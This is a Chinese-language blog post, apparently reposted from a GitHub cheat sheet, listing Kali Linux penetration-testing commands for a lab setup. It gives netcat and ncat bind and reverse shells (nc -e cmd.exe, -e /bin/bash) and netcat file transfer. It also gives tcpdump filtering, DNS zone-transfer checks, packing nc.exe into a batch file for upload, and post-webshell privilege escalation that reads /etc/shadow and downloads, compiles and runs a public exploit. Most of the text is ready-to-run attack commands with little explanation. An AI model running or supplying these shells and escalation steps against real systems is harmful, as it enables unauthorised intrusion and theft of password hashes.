kali作為一個滲透測試者最受歡迎的作業系統,整合了非常多的安全工具,讓滲透測試人員更方便的做一些滲透測試工作,本文來自國外某位大神的github,在這裡給大家做一個分享,具體內容如下:
Netcat
netcat是一個優秀的網路工具,在業界有“瑞士軍刀”的美譽,通常在Linux系統下都自帶了。
測試環境
Kali 192.168.2.10
Windows 192.168.2.12
聊天
Windows nc -nlvp 4444
Kali nc -nv 192.168.2.12 4444
正向shell
Windows nc -nlvp 4444 -e cmd.exe
Kali nc -nv 192.168.2.12 4444
反向shell
Windows nc -nlvp 4444
Kali nc -nv 192.168.2.12 4444 -e /bin/bash
檔案傳輸
Windows nc -nlvp 4444 > incoming.exe
Kali nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe
Ncat
Ncat是nmap工具集的一部分,使用如下命令使用Ncat生成一個正向shell:
Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl
Linux ncat -nv 192.168.2.12 4444 --ssl
tcpdump
tcpdump是Linux下一個網路包擷取分析工具。它支援針對網路層、協議、主機、網路或埠的過濾,並提供and、or、not等邏輯語句來幫助你去掉無用的資訊。
讀取資料包檔案
tcpdump -r <capture.pcap>
指定源IP獲取資料包檔案中的資料
tcpdump -n src host 192.168.2.10 -r <capture.pcap>
指定目的IP獲取資料包檔案中的資料
tcpdump -n dst host 192.168.2.12 -r <capture.pcap>
指定埠獲取資料包檔案中的資料
tcpdump -n port 443 -r <capture.pcap>
讀取資料包檔案並且以16進位制顯示
tcpdump -nX -r <capture.pcap>
利用host獲取dns資訊
host是一個用來執行dns查詢的小工具。
列舉dns資訊
host -t <type> target.com
mx = mail server
ns = name server
測試dns域傳送
host -l target.com <DNS server>
###EXE轉bat
在某些特殊的情況下需要將exe轉為bat,便於上傳並執行,下面就是如何使用kali將exe轉為bat。
cp /usr/share/windows-binaries/nc.exe /root/
cp /usr/share/windows-binaries/exe2bat.exe /root/
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
Linux本地提權
在獲得一個webshell之後,一般許可權為apache許可權,想要進一步的滲透測試需要將自己的許可權提升到最高,下面是在Linux下提權使用命令。
ssh user@<target IP>
id # 顯示使用者和組的許可權
cat /etc/shadow # 儲存的使用者的密碼,只有root許可權可以檢視
cat /etc/issue # 檢視系統版本資訊
uname -a
如何下載並執行提權exp:
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o exploit exploit.c # 編譯
./exploit # 執行
id # 檢視是否提權成功
cat /etc/shadow # 讀取使用者密碼
總結
這個文章其實有點不想發,但是又沒有好文章給大家分享,所以就湊合著給大家看看,畢竟不想浪費今天發文的機會,大家有好的文章不要藏著掖著,發給我有好禮相送呦。最後祝大家國慶節快樂,在玩的同時也別忘了學習呀!